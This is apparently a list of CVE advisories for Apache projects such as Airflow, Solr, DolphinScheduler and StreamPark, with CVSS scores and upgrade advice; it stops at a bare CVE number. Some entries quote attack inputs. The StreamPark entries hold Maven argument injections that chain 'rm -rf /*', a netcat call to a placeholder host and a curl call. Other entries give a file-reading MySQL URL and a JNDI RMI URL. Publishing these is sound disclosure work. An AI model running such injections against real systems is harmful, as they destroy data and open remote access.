Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache DolphinScheduler. This issue affects Apache DolphinScheduler: before 3.2.1. Users are recommended to upgrade to version 3.2.1, which fixes the issue. At the time of disclosure of this advisory, this version has not yet been released. In the meantime, we recommend you make sure the logs are only available to trusted operators.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2023-49070

Pre-auth RCE in Apache OFBiz 18.12.09. It is due to the XML-RPC component, which is no longer maintained, still being present. This issue affects Apache OFBiz: before 18.12.10. Users are recommended to upgrade to version 18.12.10.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2023-49145

Apache NiFi 0.7.0 through 1.23.2 include the JoltTransformJSON Processor, which provides an advanced configuration user interface that is vulnerable to DOM-based cross-site scripting. If an authenticated user, who is authorized to configure a JoltTransformJSON Processor, visits a crafted URL, then arbitrary JavaScript code can be executed within the session context of the authenticated user. Upgrading to Apache NiFi 1.24.0 or 2.0.0-M1 is the recommended mitigation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7
security@apache.org 7.9 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L 1.3 6.0

Products Affected

Vendor Product Version
apache nifi *
CVE-2023-49198

MySQL security vulnerability in Apache SeaTunnel. Attackers can read files on the MySQL server by modifying the information in the MySQL URL: allowLoadLocalInfile=true&allowUrlInLocalInfile=true&allowLoadLocalInfileInPath=/&maxAllowedPacket=655360. This issue affects Apache SeaTunnel: 1.0.0. Users are recommended to upgrade to version [1.0.1], which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache seatunnel 1.0.0
CVE-2023-49299

Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed JavaScript to be executed on the server. This issue affects Apache DolphinScheduler: until 3.1.9. Users are recommended to upgrade to version 3.1.9, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2023-49566

In Apache Linkis <=1.5.0, due to the lack of effective filtering of parameters, an attacker configuring malicious DB2 parameters in the DataSource Manager Module can cause JNDI injection. Therefore, the parameters in the DB2 URL should be blacklisted. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis <=1.5.0 are affected. We recommend users upgrade Linkis to version 1.6.0.

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-49582

Lax permissions set by the Apache Portable Runtime library on Unix platforms would allow local users read access to named shared memory segments, potentially revealing sensitive application data. This issue does not affect non-Unix platforms, or builds with APR_USE_SHMEM_SHMGET=1 (apr.h). Users are recommended to upgrade to APR version 1.7.5, which fixes this issue.

Products Affected

Vendor Product Version
apache portable_runtime *
CVE-2023-49619

Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Apache Answer. This issue affects Apache Answer: through 1.2.0. Under normal circumstances, a user can only bookmark a question once, and the question's bookmark count will only increase once. However, repeated submissions through a script can increase the question's bookmark count many times. Users are recommended to upgrade to version [1.2.1], which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 3.1 LOW CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N 1.6 1.4

Products Affected

Vendor Product Version
apache answer *
CVE-2023-49620

Before DolphinScheduler version 3.1.0, a logged-in user could delete UDF functions in the resource center without authorization (UDF functions are commonly used in SQL tasks), an insecure direct object reference (IDOR) vulnerability; version 3.1.0 fixes this issue. This CVE is rated moderate because it still requires user login to operate; please upgrade to version 3.1.0 to avoid this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2023-49657

A stored cross-site scripting (XSS) vulnerability exists in Apache Superset before 3.0.3. An authenticated attacker with create/update permissions on charts or dashboards could store a script or add a specific HTML snippet that would act as a stored XSS. For 2.X versions, users should change their config to include:

```python
TALISMAN_CONFIG = {
    "content_security_policy": {
        "base-uri": ["'self'"],
        "default-src": ["'self'"],
        "img-src": ["'self'", "blob:", "data:"],
        "worker-src": ["'self'", "blob:"],
        "connect-src": [
            "'self'",
            "https://api.mapbox.com",
            "https://events.mapbox.com",
        ],
        "object-src": "'none'",
        "style-src": [
            "'self'",
            "'unsafe-inline'",
        ],
        "script-src": ["'self'", "'strict-dynamic'"],
    },
    "content_security_policy_nonce_in": ["script-src"],
    "force_https": False,
    "session_cookie_secure": False,
}
```

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7
security@apache.org 9.6 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N 3.1 5.8

Products Affected

Vendor Product Version
apache superset *
CVE-2023-49733

Improper Restriction of XML External Entity Reference vulnerability in Apache Cocoon. This issue affects Apache Cocoon: from 2.2.0 before 2.3.0. Users are recommended to upgrade to version 2.3.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache cocoon *
CVE-2023-49734

An authenticated Gamma user has the ability to create a dashboard and add charts to it; this user would automatically become one of the owners of the charts, incorrectly giving them write permissions to these charts. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2 or 2.1.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6
security@apache.org 7.7 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N 3.1 4.0

Products Affected

Vendor Product Version
apache superset *
CVE-2023-49735

** UNSUPPORTED WHEN ASSIGNED ** The value set as the DefaultLocaleResolver.LOCALE_KEY attribute on the session was not validated while resolving XML definition files, leading to possible path traversal and eventually SSRF/XXE when passing user-controlled data to this key. Passing user-controlled data to this key may be relatively common, as it was also used like that to set the language in the 'tiles-test' application shipped with Tiles. This issue affects Apache Tiles from version 2 onwards. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache tiles *
CVE-2023-49736

A where_in JINJA macro allows users to specify a quote, which combined with a carefully crafted statement would allow for SQL injection in Apache Superset. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9
security@apache.org 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2023-49898

In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2. Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 1.2 5.9

Products Affected

Vendor Product Version
apache streampark *
CVE-2023-49920

Apache Airflow, version 2.7.0 through 2.7.3, has a vulnerability that allows an attacker to trigger a DAG in a GET request without CSRF validation. As a result, it was possible for a malicious website opened in the same browser, by a user who also had the Airflow UI open, to trigger the execution of DAGs without the user's consent. Users are advised to upgrade to version 2.8.0 or later, which is not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-50164

An attacker can manipulate file upload params to enable path traversal, and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. Users are recommended to upgrade to Struts 2.5.33 or Struts 6.3.0.2 or greater to fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache struts *
CVE-2023-50290

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr. The Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users are able to specify which environment variables to hide; however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, as Java system properties can be, and may be set for the entire host, unlike Java system properties, which are set per Java process. The Solr Metrics API is protected by the "metrics-read" permission. Therefore, Solr Clouds with Authorization set up will only be vulnerable via users with the "metrics-read" permission. This issue affects Apache Solr: from 9.0.0 before 9.3.0. Users are recommended to upgrade to version 9.3.0 or later, in which environment variables are not published via the Metrics API.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache solr *
CVE-2023-50291

Insufficiently Protected Credentials vulnerability in Apache Solr. This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.3.0. One of the two endpoints that publishes the Solr process' Java system properties, /admin/info/properties, was only set up to hide system properties that had "password" contained in the name. There are a number of sensitive system properties, such as "basicauth" and "aws.secretKey", that do not contain "password", thus their values were published via the "/admin/info/properties" endpoint. This endpoint populates the list of System Properties on the home screen of the Solr Admin page, making the exposed credentials visible in the UI. This /admin/info/properties endpoint is protected under the "config-read" permission. Therefore, Solr Clouds with Authorization enabled will only be vulnerable through logged-in users that have the "config-read" permission. Users are recommended to upgrade to version 9.3.0 or 8.11.3, which fixes the issue. A single option now controls hiding Java system properties for all endpoints, "-Dsolr.hiddenSysProps". By default all known sensitive properties are hidden (including "-Dbasicauth"), as well as any property with a name containing "secret" or "password". Users who cannot upgrade can also use the following Java system property to fix the issue: '-Dsolr.redaction.system.pattern=.*(password|secret|basicauth).*'

Products Affected

Vendor Product Version
apache solr *
CVE-2023-50292

Incorrect Permission Assignment for Critical Resource, Improper Control of Dynamically-Managed Code Resources vulnerability in Apache Solr. This issue affects Apache Solr: from 8.10.0 through 8.11.2, from 9.0.0 before 9.3.0. The Schema Designer was introduced to allow users to more easily configure and test new Schemas and configSets. However, when the feature was created, the "trust" (authentication) of these configSets was not considered. External library loading is only available to configSets that are "trusted" (created by authenticated users), thus non-authenticated users are unable to perform Remote Code Execution. Since the Schema Designer loaded configSets without taking their "trust" into account, configSets that were created by unauthenticated users were allowed to load external libraries when used in the Schema Designer. Users are recommended to upgrade to version 9.3.0, which fixes the issue.

Products Affected

Vendor Product Version
apache solr *
CVE-2023-50298

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr. This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1. Solr Streaming Expressions allows users to extract data from other Solr Clouds, using a "zkHost" parameter. When the original SolrCloud is set up to use ZooKeeper credentials and ACLs, they will be sent to whatever "zkHost" the user provides. An attacker could set up a server to mock ZooKeeper, that accepts ZooKeeper requests with credentials and ACLs and extracts the sensitive information, then send a streaming expression using the mock server's address in "zkHost". Streaming Expressions are exposed via the "/streaming" handler, with "read" permissions. Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue. From these versions on, only zkHost values that have the same server address (regardless of chroot) will use the given ZooKeeper credentials and ACLs when connecting.

Products Affected

Vendor Product Version
apache solr *
CVE-2023-50378

Lack of proper input validation and constraint enforcement in Apache Ambari prior to 2.7.8. Impact: as this is a stored XSS, it could be exploited to perform unauthorized actions, ranging from data access to session hijacking and delivering malicious payloads. Users are recommended to upgrade to version 2.7.8, which fixes this issue.

Products Affected

Vendor Product Version
apache ambari *
CVE-2023-50379

Malicious code injection in Apache Ambari prior to 2.7.8. Users are recommended to upgrade to version 2.7.8, which fixes this issue. Impact: a Cluster Operator can manipulate the request by adding a malicious code injection and gain root over the cluster main host.

Products Affected

Vendor Product Version
apache ambari *
CVE-2023-50380

XML External Entity injection in Apache Ambari versions <= 2.7.7. Users are recommended to upgrade to version 2.7.8, which fixes this issue. More details: Oozie Workflow Scheduler had a vulnerability that allowed for root-level file reading and privilege escalation from low-privilege users. The vulnerability was caused by a lack of proper user input validation. This vulnerability is known as an XML External Entity (XXE) injection attack. Attackers can exploit XXE vulnerabilities to read arbitrary files on the server, including sensitive system files. In theory, it might be possible to use this to escalate privileges.

Products Affected

Vendor Product Version
apache ambari *
CVE-2023-50386

Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of File with Dangerous Type, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Solr. This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1. In the affected versions, Solr ConfigSets accepted Java jar and class files to be uploaded through the ConfigSets API. When backing up Solr Collections, these configSet files would be saved to disk when using the LocalFileSystemRepository (the default for backups). If the backup was saved to a directory that Solr uses in its ClassPath/ClassLoaders, then the jar and class files would be available to use with any ConfigSet, trusted or untrusted. When Solr is run in a secure way (Authorization enabled), as is strongly suggested, this vulnerability is limited to extending the Backup permissions with the ability to add libraries. Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue. In these versions, the following protections have been added:

- Users are no longer able to upload files to a configSet that could be executed via a Java ClassLoader.
- The Backup API restricts saving backups to directories that are used in the ClassLoader.

Products Affected

Vendor Product Version
apache solr *
CVE-2023-50740

In Apache Linkis <=1.4.0, the password is printed to the log when using the Oracle data source of the Linkis data source module. We recommend users upgrade Linkis to version 1.5.0.

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-50780

Apache ActiveMQ Artemis allows access to diagnostic information and controls through MBeans, which are also exposed through the authenticated Jolokia endpoint. Before version 2.29.0, this also included the Log4J2 MBean. This MBean is not meant for exposure to non-administrative users. This could eventually allow an authenticated attacker to write arbitrary files to the filesystem and indirectly achieve RCE. Users are recommended to upgrade to version 2.29.0 or later, which fixes the issue.

Products Affected

Vendor Product Version
apache activemq_artemis *
CVE-2023-50783

Apache Airflow, versions before 2.8.0, is affected by a vulnerability that allows an authenticated user without the variable edit permission to update a variable. This flaw compromises the integrity of variable management, potentially leading to unauthorized data modification. Users are recommended to upgrade to 2.8.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-50943

Apache Airflow, versions before 2.8.1, have a vulnerability that allows a potential attacker to poison the XCom data by bypassing the protection of "enable_xcom_pickling=False" configuration setting resulting in poisoned data after XCom deserialization. This vulnerability is considered low since it requires a DAG author to exploit it. Users are recommended to upgrade to version 2.8.1 or later, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-50944

Apache Airflow, versions before 2.8.1, have a vulnerability that allows an authenticated user to access the source code of a DAG to which they don't have access. This vulnerability is considered low since it requires an authenticated user to exploit it. Users are recommended to upgrade to version 2.8.1, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-50968

Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when a user makes a URI call without authorization. The same URI can also be used to perform an SSRF attack without authorization. Users are recommended to upgrade to version 18.12.11, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2023-51388

Hertzbeat is a real-time monitoring system. In `CalculateAlarm.java`, `AviatorEvaluator` is used to directly execute the expression function, and no security policy is configured, resulting in AviatorScript (which can execute any static method by default) script injection. Version 1.4.1 fixes this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2023-51389

Hertzbeat is a real-time monitoring system. At the interface of `/define/yml`, SnakeYAML is used as a parser to parse yml content, but no security configuration is used, resulting in a YAML deserialization vulnerability. Version 1.4.1 fixes this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2023-51437

Observable timing discrepancy vulnerability in Apache Pulsar SASL Authentication Provider can allow an attacker to forge a SASL Role Token that will pass signature verification. Users are recommended to upgrade to version 2.11.3, 3.0.2, or 3.1.1 which fixes the issue. Users should also consider updating the configured secret in the `saslJaasServerRoleTokenSignerSecretPath` file. Any component matching an above version running the SASL Authentication Provider is affected. That includes the Pulsar Broker, Proxy, Websocket Proxy, or Function Worker. 2.11 Pulsar users should upgrade to at least 2.11.3. 3.0 Pulsar users should upgrade to at least 3.0.2. 3.1 Pulsar users should upgrade to at least 3.1.1. Any users running Pulsar 2.8, 2.9, 2.10, and earlier should upgrade to one of the above patched versions. For additional details on this attack vector, please refer to https://codahale.com/a-lesson-in-timing-attacks/ .

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 2.2 5.2

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 3.1.0
CVE-2023-51441

** UNSUPPORTED WHEN ASSIGNED ** Improper Input Validation vulnerability in Apache Axis allowed users with access to the admin service to perform possible SSRF. This issue affects Apache Axis: through 1.3. As Axis 1 has been EOL, we recommend you migrate to a different SOAP engine, such as Apache Axis 2/Java. Alternatively you could use a build of Axis with the patch from https://github.com/apache/axis-axis1-java/commit/685c309febc64aa393b2d64a05f90e7eb9f73e06 applied. The Apache Axis project does not expect to create an Axis 1.x release fixing this problem, though contributors that would like to work towards this are welcome.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 1.2 5.9

Products Affected

Vendor Product Version
apache axis *
CVE-2023-51467

The vulnerability permits attackers to circumvent authentication processes, enabling them to remotely execute arbitrary code.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2023-51518

Apache James prior to versions 3.7.5 and 3.8.0 exposes a JMX endpoint on localhost subject to pre-authentication deserialisation of untrusted data. Given a deserialisation gadget, this could be leveraged as part of an exploit chain that could result in privilege escalation. Note that by default the JMX endpoint is only bound locally. We recommend users to:

- Upgrade to a non-vulnerable Apache James version
- Run Apache James isolated from other processes (docker, dedicated virtual machine)
- If possible, turn off JMX

Products Affected

Vendor Product Version
apache james 3.7.5
apache james 3.8.0
CVE-2023-51653

Hertzbeat is a real-time monitoring system. In the implementation of `JmxCollectImpl.java`, `JMXConnectorFactory.connect` is vulnerable to JNDI injection. The corresponding interface is `/api/monitor/detect`. If there is a URL field, the address will be used by default. When the URL is `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, it can be exploited to cause remote code execution. Version 1.4.1 contains a fix for this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2023-51656

Deserialization of Untrusted Data vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 0.13.0 through 0.13.4. Users are recommended to upgrade to version 1.2.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache iotdb *
CVE-2023-51702

Since version 5.2.0, when using deferrable mode with the path of a Kubernetes configuration file for authentication, the Airflow worker serializes this configuration file as a dictionary and sends it to the triggerer by storing it in metadata without any encryption. Additionally, if used with an Airflow version between 2.3.0 and 2.6.0, the configuration dictionary will be logged as plain text in the triggerer service without masking. This allows anyone with access to the metadata or triggerer log to obtain the configuration file and use it to access the Kubernetes cluster. This behavior was changed in version 7.0.0, which stopped serializing the file contents and started providing the file path instead to read the contents into the trigger. Users are recommended to upgrade to version 7.0.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
apache airflow_cncf_kubernetes *
CVE-2023-51747

Apache James prior to versions 3.8.1 and 3.7.5 is vulnerable to SMTP smuggling. A lenient behaviour in line delimiter handling might create a difference of interpretation between the sender and the receiver, which can be exploited by an attacker to forge an SMTP envelope, allowing for instance to bypass SPF checks. The patch implies enforcement of CRLF as the line delimiter as part of the DATA transaction. We recommend James users upgrade to non-vulnerable versions.

Products Affected

Vendor Product Version
apache james 3.7.5
apache james 3.8.1
CVE-2023-51770

Arbitrary File Read Vulnerability in Apache DolphinScheduler. This issue affects Apache DolphinScheduler: before 3.2.1. We recommend users upgrade Apache DolphinScheduler to version 3.2.1, which fixes the issue.

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2023-51784

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache InLong. This issue affects Apache InLong: from 1.5.0 through 1.9.0, and could lead to Remote Code Execution. Users are advised to upgrade to Apache InLong 1.10.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/9329

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-51785

Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.7.0 through 1.9.0; attackers can perform an arbitrary file read attack using the MySQL driver. Users are advised to upgrade to Apache InLong 1.10.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/9331

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-52290

In the streampark-console list pages (e.g. application pages), users can sort a page by field. This sort field is sent from the front end to the back end, and the SQL query is generated using this field. However, because this sort field is not validated, there is a risk of SQL injection. The attacker must successfully log into the system to launch an attack, which may cause data leakage. Since no data will be written, this is a low-impact vulnerability. Mitigation: all users should upgrade to 2.1.4; such parameters will be blocked.

Products Affected

Vendor Product Version
apache streampark *
CVE-2023-52291

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: in the "Project" module, the "<" operator in the Maven build args causes command injection; e.g. "< (curl http://xxx.com )" will be executed as a command injection. Mitigation: all users should upgrade to 2.1.4; the "<" operator will be blocked.

Products Affected

Vendor Product Version
apache streampark *
CVE-2024-21733

Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43. Other, EOL versions may also be affected. Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2024-21742

Improper input validation allows for header injection in the MIME4J library when using the MIME4J DOM for composing messages. This can be exploited by an attacker to add unintended headers to MIME messages.

Products Affected

Vendor Product Version
apache james_mime4j *
CVE-2024-22281

** UNSUPPORTED WHEN ASSIGNED ** The Apache Helix Front (UI) component contained a hard-coded secret, allowing an attacker to spoof sessions by generating their own fake cookies. This issue affects Apache Helix Front (UI): all versions. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache helix *
CVE-2024-22371

Exposure of sensitive data by crafting a malicious EventFactory and providing a custom ExchangeCreatedEvent that exposes sensitive data. Vulnerability in Apache Camel. This issue affects Apache Camel: from 3.21.X through 3.21.3, from 3.22.X through 3.22.0, from 4.0.X through 4.0.3, from 4.X through 4.3.0. Users are recommended to upgrade to version 3.21.4, 3.22.1, 4.0.4 or 4.4.0, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 2.9 LOW CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N 1.4 1.4

Products Affected

Vendor Product Version
apache camel *
apache camel 3.22.0
CVE-2024-22393

Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer. This issue affects Apache Answer: through 1.2.1. A pixel flood attack, uploading image files with very large pixel dimensions, will cause the server to run out of memory. A logged-in user can cause such an attack by uploading an image when posting content. Users are recommended to upgrade to version [1.2.5], which fixes the issue.

Products Affected

Vendor Product Version
apache answer *
CVE-2024-22399

Deserialization of Untrusted Data vulnerability in Apache Seata. When developers disable authentication on the Seata-Server and do not use the Seata client SDK dependencies, attackers may construct uncontrolled serialized malicious requests by directly sending bytecode based on the Seata private protocol. This issue affects Apache Seata: 2.0.0, from 1.0.0 through 1.8.0. Users are recommended to upgrade to version 2.1.0/1.8.1, which fixes the issue.

Products Affected

Vendor Product Version
apache seata *
apache seata 2.0.0
CVE-2024-23321

For RocketMQ versions 5.2.0 and below, under certain conditions, there is a risk of exposure of sensitive information to an unauthorized actor even if RocketMQ has authentication and authorization functions enabled. An attacker possessing regular user privileges, or listed in the IP whitelist, could potentially acquire the administrator's account and password through specific interfaces. Such an action would grant them full control over RocketMQ, provided they have access to the broker IP address list. To mitigate these security threats, it is strongly advised that users upgrade to version 5.3.0 or newer. Additionally, we recommend that users use RocketMQ ACL 2.0 instead of the original RocketMQ ACL when upgrading to Apache RocketMQ 5.3.0.

Products Affected

Vendor Product Version
apache rocketmq *
CVE-2024-23349

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Answer. This issue affects Apache Answer: through 1.2.1. XSS attack when a user enters a summary. A logged-in user, when modifying their own submitted question, can input malicious code in the summary to create such an attack. Users are recommended to upgrade to version [1.2.5], which fixes the issue.

Products Affected

Vendor Product Version
apache answer *
CVE-2024-23452

